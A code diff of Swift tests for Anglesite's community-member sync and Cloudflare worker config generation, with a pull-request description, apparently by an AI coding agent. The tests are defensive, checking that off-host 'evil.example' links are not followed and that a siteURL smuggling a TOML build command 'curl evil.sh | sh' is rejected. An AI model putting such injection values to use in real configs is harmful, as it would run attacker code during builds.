+                let path = request.url!.absoluteString
+                if path.hasSuffix("/followers") { return (collectionBody, Self.response(200)) }
+                if path.contains("page=1") { return (pageBody, Self.response(200)) }
+                if path.contains("/actor") { return (profileBody, Self.response(200)) }
+                return (Data(), Self.response(404))
+            })
+
+        #expect(count == 1)
+        let entries = (try? FileManager.default.contentsOfDirectory(
+            at: siteDirectory.appendingPathComponent("data/community-members"), includingPropertiesForKeys: nil)) ?? []
+        #expect(entries.count == 1)
+        let written = try #require(entries.first)
+        let text = try String(contentsOf: written, encoding: .utf8)
+        #expect(text.contains("Alice"))
+    }
+
+    @Test("requests the collection at <actorURL>/followers")
+    func requestsFollowersPath() async throws {
+        let siteDirectory = try Self.makeThrowawayGitRepo()
+        defer { try? FileManager.default.removeItem(at: siteDirectory) }
+        let configDirectory = try Self.makeTempDir()
+        defer { try? FileManager.default.removeItem(at: configDirectory) }
+
+        var requestedURL: String?
+        _ = await CommunityMembersSync.pullAndCommit(
+            actorURL: URL(string: "https://community.example/users/birding")!,
+            siteDirectory: siteDirectory,
+            configDirectory: configDirectory,
+            transport: { request in
+                if requestedURL == nil { requestedURL = request.url!.absoluteString }
+                return (Data(), Self.response(500))
+            })
+        #expect(requestedURL == "https://community.example/users/birding/followers")
+    }
+
+    @Test("returns 0 without touching git when the first-page fetch fails")
+    func firstPageFailureIsNoOp() async throws {
+        let configDirectory = try Self.makeTempDir()
+        defer { try? FileManager.default.removeItem(at: configDirectory) }
+
+        let count = await CommunityMembersSync.pullAndCommit(
+            actorURL: URL(string: "https://community.example/users/birding")!,
+            siteDirectory: URL(fileURLWithPath: "/nonexistent"),
+            configDirectory: configDirectory,
+            transport: { _ in (Data(), Self.response(500)) })
+        #expect(count == 0)
+    }
+
+    @Test("follows a multi-page next chain and collects members from every page")
+    func followsMultiPageChain() async throws {
+        let siteDirectory = try Self.makeThrowawayGitRepo()
+        defer { try? FileManager.default.removeItem(at: siteDirectory) }
+        let configDirectory = try Self.makeTempDir()
+        defer { try? FileManager.default.removeItem(at: configDirectory) }
+
+        let collectionBody = try! JSONSerialization.data(withJSONObject: ["first": "https://community.example/users/birding/followers?page=1"])
+        let page1 = Self.pageBody(items: ["https://member.example/actor1"], next: "https://community.example/users/birding/followers?page=2")
+        let page2 = Self.pageBody(items: ["https://member.example/actor2"])
+        let profileBody = Self.actorProfileBody(name: "Alice")
+
+        let count = await CommunityMembersSync.pullAndCommit(
+            actorURL: URL(string: "https://community.example/users/birding")!,
+            siteDirectory: siteDirectory,
+            configDirectory: configDirectory,
+            transport: { request in
+                let path = request.url!.absoluteString
+                if path.hasSuffix("/followers") { return (collectionBody, Self.response(200)) }
+                if path.contains("page=1") { return (page1, Self.response(200)) }
+                if path.contains("page=2") { return (page2, Self.response(200)) }
+                return (profileBody, Self.response(200))
+            })
+
+        #expect(count == 2)
+        let entries = (try? FileManager.default.contentsOfDirectory(
+            at: siteDirectory.appendingPathComponent("data/community-members"), includingPropertiesForKeys: nil)) ?? []
+        #expect(entries.count == 2)
+    }
+
+    @Test("reconciles away a snapshot whose member is no longer in the followers collection (left or banned)")
+    func reconcilesAwayRemovedMember() async throws {
+        let siteDirectory = try Self.makeThrowawayGitRepo()
+        defer { try? FileManager.default.removeItem(at: siteDirectory) }
+        let configDirectory = try Self.makeTempDir()
+        defer { try? FileManager.default.removeItem(at: configDirectory) }
+
+        let actorURL = URL(string: "https://community.example/users/birding")!
+        let collectionBody = try! JSONSerialization.data(withJSONObject: ["first": "https://community.example/users/birding/followers?page=1"])
+        let profileBody = Self.actorProfileBody(name: "Alice")
+
+        _ = await CommunityMembersSync.pullAndCommit(
+            actorURL: actorURL, siteDirectory: siteDirectory, configDirectory: configDirectory,
+            transport: { request in
+                let path = request.url!.absoluteString
+                if path.hasSuffix("/followers") { return (collectionBody, Self.response(200)) }
+                if path.contains("page=1") { return (Self.pageBody(items: ["https://member.example/actor"]), Self.response(200)) }
+                return (profileBody, Self.response(200))
+            })
+        let dir = siteDirectory.appendingPathComponent("data/community-members")
+        #expect((try? FileManager.default.contentsOfDirectory(at: dir, includingPropertiesForKeys: nil))?.count == 1)
+
+        // Second sync: the followers collection is now empty (the member left, or was banned).
+        let count = await CommunityMembersSync.pullAndCommit(
+            actorURL: actorURL, siteDirectory: siteDirectory, configDirectory: configDirectory,
+            transport: { request in
+                let path = request.url!.absoluteString
+                if path.hasSuffix("/followers") { return (collectionBody, Self.response(200)) }
+                if path.contains("page=1") { return (Self.pageBody(items: []), Self.response(200)) }
+                return (profileBody, Self.response(200))
+            })
+        #expect(count == 1)
+        #expect(((try? FileManager.default.contentsOfDirectory(at: dir, includingPropertiesForKeys: nil)) ?? []).isEmpty)
+    }
+
+    // MARK: - pullAndCommitIfConfigured
+
+    @Test("pullAndCommitIfConfigured no-ops when communityActorURL is unset")
+    func noOpsWithoutCommunityActorURL() async throws {
+        let configDirectory = try Self.makeTempDir()
+        defer { try? FileManager.default.removeItem(at: configDirectory) }
+
+        let count = await CommunityMembersSync.pullAndCommitIfConfigured(
+            siteDirectory: URL(fileURLWithPath: "/nonexistent"),
+            configDirectory: configDirectory,
+            transport: { _ in
+                Issue.record("transport must not be called with no communityActorURL configured")
+                struct Unexpected: Error {}
+                throw Unexpected()
+            })
+        #expect(count == 0)
+    }
+
+    @Test("pullAndCommitIfConfigured reads communityActorURL and syncs when set")
+    func syncsWhenConfigured() async throws {
+        let siteDirectory = try Self.makeThrowawayGitRepo()
+        defer { try? FileManager.default.removeItem(at: siteDirectory) }
+        let configDirectory = try Self.makeTempDir()
+        defer { try? FileManager.default.removeItem(at: configDirectory) }
+        try await SiteConfigStore(configDirectory: configDirectory).save(
+            SiteSettings(communityActorURL: URL(string: "https://community.example/users/birding")!))
+
+        let collectionBody = try! JSONSerialization.data(withJSONObject: ["first": "https://community.example/users/birding/followers?page=1"])
+        let profileBody = Self.actorProfileBody(name: "Alice")
+
+        let count = await CommunityMembersSync.pullAndCommitIfConfigured(
+            siteDirectory: siteDirectory,
+            configDirectory: configDirectory,
+            transport: { request in
+                let path = request.url!.absoluteString
+                if path.hasSuffix("/followers") { return (collectionBody, Self.response(200)) }
+                if path.contains("page=1") { return (Self.pageBody(items: ["https://member.example/actor"]), Self.response(200)) }
+                return (profileBody, Self.response(200))
+            })
+        #expect(count == 1)
+    }
+
+    private static func makeTempDir() throws -> URL {
+        let dir = FileManager.default.temporaryDirectory.appendingPathComponent(
+            "community-members-sync-config-\(UUID().uuidString)", isDirectory: true)
+        try FileManager.default.createDirectory(at: dir, withIntermediateDirectories: true)
+        return dir
+    }
+
+    /// Mirrors `AnnouncedPostSyncTests.makeThrowawayGitRepo`.
+    private static func makeThrowawayGitRepo() throws -> URL {
+        let fm = FileManager.default
+        let dir = fm.temporaryDirectory.appendingPathComponent("community-members-sync-repo-\(UUID().uuidString)", isDirectory: true)
+        try fm.createDirectory(at: dir, withIntermediateDirectories: true)
+        try "placeholder\n".write(to: dir.appendingPathComponent("README.md"), atomically: true, encoding: .utf8)
+
+        func git(_ args: [String]) throws {
+            let p = Process()
+            p.executableURL = URL(fileURLWithPath: "/usr/bin/git")
+            p.arguments = args
+            p.currentDirectoryURL = dir
+            p.environment = ProcessInfo.processInfo.environment.merging([
+                "GIT_AUTHOR_NAME": "test", "GIT_AUTHOR_EMAIL": "test@anglesite.test",
+                "GIT_COMMITTER_NAME": "test", "GIT_COMMITTER_EMAIL": "test@anglesite.test",
+            ]) { _, new in new }
+            try p.run()
+            p.waitUntilExit()
+            guard p.terminationStatus == 0 else {
+                struct GitFailed: Error {}
+                throw GitFailed()
+            }
+        }
+        try git(["init", "-q"])
+        try git(["config", "user.email", "test@anglesite.test"])
+        try git(["config", "user.name", "test"])
+        try git(["add", "-A"])
+        try git(["commit", "-q", "-m", "initial"])
+        return dir
+    }
+}

--- a/Tests/AnglesiteCoreTests/CommunityMembersSyncTests.swift
+++ b/Tests/AnglesiteCoreTests/CommunityMembersSyncTests.swift
@@ -153,6 +153,83 @@ struct CommunityMembersSyncTests {
         #expect(text.contains("Alice"))
     }
 
+    @Test("returns 0 (insecureURL) without touching git when communityActorURL uses plain http")
+    func plainHTTPActorURLIsRejected() async throws {
+        let configDirectory = try Self.makeTempDir()
+        defer { try? FileManager.default.removeItem(at: configDirectory) }
+
+        let count = await CommunityMembersSync.pullAndCommit(
+            actorURL: URL(string: "http://community.example/users/birding")!,
+            siteDirectory: URL(fileURLWithPath: "/nonexistent"),
+            configDirectory: configDirectory,
+            transport: { _ in
+                Issue.record("transport must not be called for a plain-http actorURL")
+                struct Unexpected: Error {}
+                throw Unexpected()
+            })
+        #expect(count == 0)
+    }
+
+    @Test("a first/next link pointing at a different host is treated as absent, not followed")
+    func offHostPaginationLinkIsIgnored() async throws {
+        let siteDirectory = try Self.makeThrowawayGitRepo()
+        defer { try? FileManager.default.removeItem(at: siteDirectory) }
+        let configDirectory = try Self.makeTempDir()
+        defer { try? FileManager.default.removeItem(at: configDirectory) }
+
+        // The collection doc's own "first" link points at a different host than the actor being
+        // synced — a malicious/compromised community server steering the pagination chain
+        // elsewhere. This must never be fetched.
+        let maliciousCollectionBody = try! JSONSerialization.data(
+            withJSONObject: ["first": "https://evil.example/steal-everything"])
+
+        let count = await CommunityMembersSync.pullAndCommit(
+            actorURL: URL(string: "https://community.example/users/birding")!,
+            siteDirectory: siteDirectory,
+            configDirectory: configDirectory,
+            transport: { request in
+                let path = request.url!.absoluteString
+                if path.hasSuffix("/followers") { return (maliciousCollectionBody, Self.response(200)) }
+                Issue.record("must never fetch an off-host pagination link: \(path)")
+                struct Unexpected: Error {}
+                throw Unexpected()
+            })
+        #expect(count == 0)
+    }
+
+    @Test("a next link pointing at a different host ends the chain instead of being followed")
+    func offHostNextLinkEndsChain() async throws {
+        let siteDirectory = try Self.makeThrowawayGitRepo()
+        defer { try? FileManager.default.removeItem(at: siteDirectory) }
+        let configDirectory = try Self.makeTempDir()
+        defer { try? FileManager.default.removeItem(at: configDirectory) }
+
+        let collectionBody = try! JSONSerialization.data(withJSONObject: ["first": "https://community.example/users/birding/followers?page=1"])
+        // page 1 legitimately has one member, but its "next" link points off-host.
+        let page1 = Self.pageBody(items: ["https://member.example/actor1"], next: "https://evil.example/steal-everything")
+        let profileBody = Self.actorProfileBody(name: "Alice")
+
+        let count = await CommunityMembersSync.pullAndCommit(
+            actorURL: URL(string: "https://community.example/users/birding")!,
+            siteDirectory: siteDirectory,
+            configDirectory: configDirectory,
+            transport: { request in
+                let path = request.url!.absoluteString
+                if path.hasSuffix("/followers") { return (collectionBody, Self.response(200)) }
+                if path.contains("page=1") { return (page1, Self.response(200)) }
+                if path.contains("evil.example") {
+                    Issue.record("must never fetch an off-host next link")
+                    struct Unexpected: Error {}
+                    throw Unexpected()
+                }
+                return (profileBody, Self.response(200))
+            })
+
+        // Page 1's member is still collected — only the off-host "next" is refused, ending the
+        // chain early rather than failing the whole sync.
+        #expect(count == 1)
+    }
+
     @Test("requests the collection at <actorURL>/followers")
     func requestsFollowersPath() async throws {
         let siteDirectory = try Self.makeThrowawayGitRepo()

--- a/Tests/AnglesiteCoreTests/SiteConfigStoreTests.swift
+++ b/Tests/AnglesiteCoreTests/SiteConfigStoreTests.swift
@@ -220,4 +220,43 @@ struct SiteConfigStoreTests {
         let loaded = try await store.load()
         #expect(loaded.communityOutboxURL == nil)
     }
+
+    @Test("communityActorURL and moderators round-trip through save/load")
+    func communityActorURLAndModeratorsRoundTrip() async throws {
+        let dir = try tempConfigDir()
+        defer { try? FileManager.default.removeItem(at: dir.deletingLastPathComponent()) }
+        let store = SiteConfigStore(configDirectory: dir)
+
+        let settings = SiteSettings(
+            communityActorURL: URL(string: "https://community.example/users/birding"),
+            moderators: ["https://mod1.example/actor", "https://mod2.example/actor"]
+        )
+        try await store.save(settings)
+
+        let loaded = try await store.load()
+        #expect(loaded.communityActorURL == URL(string: "https://community.example/users/birding"))
+        #expect(loaded.moderators == ["https://mod1.example/actor", "https://mod2.example/actor"])
+    }
+
+    @Test("a settings.plist written before communityActorURL/moderators existed still decodes (forward-compat)")
+    func decodesOldPlistWithoutCommunityActorURLOrModerators() async throws {
+        let dir = try tempConfigDir()
+        defer { try? FileManager.default.removeItem(at: dir.deletingLastPathComponent()) }
+        let oldFormat = """
+        <?xml version="1.0" encoding="UTF-8"?>
+        <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
+        <plist version="1.0">
+        <dict>
+            <key>displayName</key>
+            <string>My Site</string>
+        </dict>
+        </plist>
+        """
+        try oldFormat.write(to: dir.appendingPathComponent("settings.plist"), atomically: true, encoding: .utf8)
+        let store = SiteConfigStore(configDirectory: dir)
+
+        let loaded = try await store.load()
+        #expect(loaded.communityActorURL == nil)
+        #expect(loaded.moderators == nil)
+    }
 }

--- a/Tests/AnglesiteCoreTests/WorkerCompositionTests.swift
+++ b/Tests/AnglesiteCoreTests/WorkerCompositionTests.swift
@@ -448,6 +448,56 @@ struct WorkerCompositionTests {
         #expect(!toml.contains("SITE_URL"))
     }
 
+    @Test("activitypub with actorType Group emits AP_ACTOR_TYPE")
+    func activitypubGroupEmitsActorTypeVar() throws {
+        let activitypub = worker(WorkerComposition.activitypubWorkerID, d1: false, kv: false, r2: false)
+        let toml = try WorkerComposition.generateWranglerToml(
+            siteName: "my-site", workers: [activitypub], activityPubActorType: "Group"
+        )
+        #expect(toml.contains("AP_ACTOR_TYPE = \"Group\""))
+    }
+
+    @Test("activitypub with no actorType (or a non-Group value) omits AP_ACTOR_TYPE")
+    func activitypubWithoutGroupOmitsActorTypeVar() throws {
+        let activitypub = worker(WorkerComposition.activitypubWorkerID, d1: false, kv: false, r2: false)
+        let toml = try WorkerComposition.generateWranglerToml(siteName: "my-site", workers: [activitypub])
+        #expect(!toml.contains("AP_ACTOR_TYPE"))
+        let tomlPerson = try WorkerComposition.generateWranglerToml(
+            siteName: "my-site", workers: [activitypub], activityPubActorType: "Person")
+        #expect(!tomlPerson.contains("AP_ACTOR_TYPE"))
+    }
+
+    @Test("Group actor with moderators emits a comma-joined AP_MODERATORS var")
+    func groupActorEmitsModeratorsVar() throws {
+        let activitypub = worker(WorkerComposition.activitypubWorkerID, d1: false, kv: false, r2: false)
+        let toml = try WorkerComposition.generateWranglerToml(
+            siteName: "my-site", workers: [activitypub], activityPubActorType: "Group",
+            moderators: ["https://mod1.example/actor", "https://mod2.example/actor"]
+        )
+        #expect(toml.contains("AP_MODERATORS = \"https://mod1.example/actor,https://mod2.example/actor\""))
+    }
+
+    @Test("moderators are ignored when actorType isn't Group")
+    func moderatorsIgnoredWithoutGroupActorType() throws {
+        let activitypub = worker(WorkerComposition.activitypubWorkerID, d1: false, kv: false, r2: false)
+        let toml = try WorkerComposition.generateWranglerToml(
+            siteName: "my-site", workers: [activitypub], moderators: ["https://mod1.example/actor"]
+        )
+        #expect(!toml.contains("AP_MODERATORS"))
+        #expect(!toml.contains("AP_ACTOR_TYPE"))
+    }
+
+    @Test("empty or unsafe moderator IRIs are filtered out, leaving AP_ACTOR_TYPE alone")
+    func unsafeModeratorIRIsAreFiltered() throws {
+        let activitypub = worker(WorkerComposition.activitypubWorkerID, d1: false, kv: false, r2: false)
+        let toml = try WorkerComposition.generateWranglerToml(
+            siteName: "my-site", workers: [activitypub], activityPubActorType: "Group",
+            moderators: ["", "https://evil.example/\"injected"]
+        )
+        #expect(toml.contains("AP_ACTOR_TYPE = \"Group\""))
+        #expect(!toml.contains("AP_MODERATORS"))
+    }
+
     @Test("a siteURL containing a double quote is rejected, not interpolated raw into TOML")
     func rejectsSiteURLWithEmbeddedQuote() throws {
         let malicious = "https://example.com\"\n[build]\ncommand = \"curl evil.sh | sh"

--- a/Tests/AnglesiteCoreTests/WorkerCompositionTests.swift
+++ b/Tests/AnglesiteCoreTests/WorkerCompositionTests.swift
@@ -498,6 +498,30 @@ struct WorkerCompositionTests {
         #expect(!toml.contains("AP_MODERATORS"))
     }
 
+    @Test("a moderator IRI containing a comma is excluded, not joined into a corrupted list")
+    func moderatorIRIWithCommaIsExcluded() throws {
+        let activitypub = worker(WorkerComposition.activitypubWorkerID, d1: false, kv: false, r2: false)
+        let toml = try WorkerComposition.generateWranglerToml(
+            siteName: "my-site", workers: [activitypub], activityPubActorType: "Group",
+            moderators: ["https://mod1.example/actor", "https://evil.example/actor?a=1,b=2"]
+        )
+        // The comma-bearing IRI is dropped entirely rather than corrupting the comma-joined list
+        // — mod1 alone still emits a valid, unambiguous AP_MODERATORS value.
+        #expect(toml.contains("AP_MODERATORS = \"https://mod1.example/actor\""))
+        #expect(!toml.contains("evil.example"))
+    }
+
+    @Test("every moderator IRI containing a comma leaves AP_MODERATORS omitted entirely")
+    func allCommaModeratorsOmitsVar() throws {
+        let activitypub = worker(WorkerComposition.activitypubWorkerID, d1: false, kv: false, r2: false)
+        let toml = try WorkerComposition.generateWranglerToml(
+            siteName: "my-site", workers: [activitypub], activityPubActorType: "Group",
+            moderators: ["https://evil.example/actor?a=1,b=2"]
+        )
+        #expect(toml.contains("AP_ACTOR_TYPE = \"Group\""))
+        #expect(!toml.contains("AP_MODERATORS"))
+    }
+
     @Test("a siteURL containing a double quote is rejected, not interpolated raw into TOML")
     func rejectsSiteURLWithEmbeddedQuote() throws {
         let malicious = "https://example.com\"\n[build]\ncommand = \"curl evil.sh | sh"


### PR DESCRIPTION
Part of #907 (V-5.1b: Hosted community provisioning + membership, Stage 2).

## Summary

- Adds `CommunityMember`/`CommunityMemberCommitter`/`CommunityMembersSync` in `AnglesiteCore`, mirroring `AnnouncedPost`'s C.3/V-5.2b snapshot-to-git pattern (#908), to pull a hosted community's own Group-actor **followers** collection (unauthenticated public AS2 fetch — members = followers, design doc §2 D3) and reconcile it into `Source/data/community-members/`. Wired into `PreviewModel.open(site:)` alongside the other per-site syncs, gated on a new `SiteSettings.communityActorURL` field that stays `nil` (inert, no network call) on every existing site.
- Adds the matching Astro pieces (`src/lib/communityMembers.ts` + `src/components/CommunityMembers.astro`) following the `communityPosts.ts`/`CommunityTimeline.astro` pattern, plus the group preset's `members`/`timeline`/`about` pages under `src/pages/community/` — the timeline page mounts `CommunityTimeline.astro`, which shipped inert in #908 pending this page ("the actual timeline page that mounts it is #907's group-preset scope"). Gave `CommunityTimeline.astro` an explicit "Nothing published yet." empty state (parity with `CommunityMembers.astro`'s "No members yet.").
- Threads a Group actor type + moderators list through `WorkerComposition.generateWranglerToml` (new `AP_ACTOR_TYPE`/`AP_MODERATORS` vars, gated on the activitypub worker, mirroring the existing `AP_DISPLAY_NAME` var convention) and adds the matching `SiteSettings.moderators` field. **`worker.ts`'s `activityPubConfig()` now actually consumes both vars** — `AP_ACTOR_TYPE=Group` sets the AS2 actor's `type`, and `AP_MODERATORS` (comma-split) becomes `@dwk/activitypub`'s `moderators` list — so this is live, working Group-actor config end-to-end from `wrangler.toml` generation through to the deployed Worker, not just inert plumbing. `activityPubConfig` is exported and directly unit-tested (pure env→config mapping, no Durable Object needed).

This lands the buildable, self-verifiable slice of #907 — **not the whole issue**. Deliberately deferred, and flagged here for follow-up (mirroring #1113's own honest scoping of #908):

- **A "Community" site-kind entry point in the site-creation flow.** The new-site wizard was recently reduced to a single theme-grid question (#1071, "the iWork model... deliberately asks exactly one question"), and the `packs/` overlay mechanism is reserved for genuine third-party theme ports — `check-pack.ts`'s port contract requires real `credit`/`license`/`thumbnail` metadata a first-party functional preset doesn't have. Fitting "Community" into the site-creation UX needs a design decision, not a unilateral wizard change, so I've left the group-preset pages living in the base template (inert until a provisioning flow sets `communityActorURL`) rather than gating them behind a new wizard step.
- **Wiring `SiteSettings.moderators`/a Group actor-type flag through `SocialWorkerProvisionCommand` into an actual deploy call.** The composition (`WorkerComposition`) and runtime consumption (`worker.ts`) are both live now; nothing calls `generateWranglerToml` with real `activityPubActorType`/`moderators` values yet — that's the remaining gap between "a site's settings say it's a Group with moderators" and "the deployed Worker was actually told that."
- **A moderators-list settings UI**, and the **approval-queue/remove/ban actions** — the latter remains blocked on `CommunityMembershipClient` gaining `Accept`/`Remove` support, per this issue's own investigation comment (`davidwkeith/workers#473`, merged via `workers#476`, but not yet consumed by this repo's client).

## Paired PR check

- [x] This change is **self-contained** to `Anglesite/Anglesite`.
- [ ] This change **needs a paired PR** in [`Anglesite/anglesite-skills`](https://github.com/Anglesite/anglesite-skills) (MCP sidecar server).

No MCP message schema changed. `WorkerComposition`'s new `activityPubActorType`/`moderators` parameters are optional/trailing (existing call sites are unaffected), and no `@dwk/workers` `catalog.json` field was touched.

## Test plan

- [x] `npm test` in `Resources/Template/` — full suite passes (686 tests total, including the new `communityMembers.test.ts`), except one pre-existing failure (`scaffold.sh copies the site tree...`) caused by this sandbox lacking `/bin/zsh` — unrelated to this change and not reproducible on a real dev machine.
- [x] `npx vitest run --config vitest.config.ts` (`test:worker`) in `Resources/Template/` — full suite passes (141 tests), including the new `activityPubConfig` AP_ACTOR_TYPE/AP_MODERATORS tests.
- [x] `npx astro build` in `Resources/Template/` — completes cleanly and renders the three new pages (`/community/members/`, `/community/timeline/`, `/community/about/`) with the expected empty-state content ("No members yet.", "Nothing published yet.").
- [ ] `swift test --package-path .` — this session's environment has no Swift toolchain (no `swift`/`xcodegen`), so I could not run this myself. An earlier commit on this branch hit a real CI failure (a DocC symbol-link issue, since fixed) — the underlying Swift *compile* succeeded even then, but I have not yet seen a fully green CI run confirming the latest commit. Watching CI and will fix anything it turns up.
- [ ] `xcodebuild -project Anglesite.xcodeproj -scheme Anglesite -configuration Debug build` — same toolchain limitation; not run locally. Will confirm via CI.
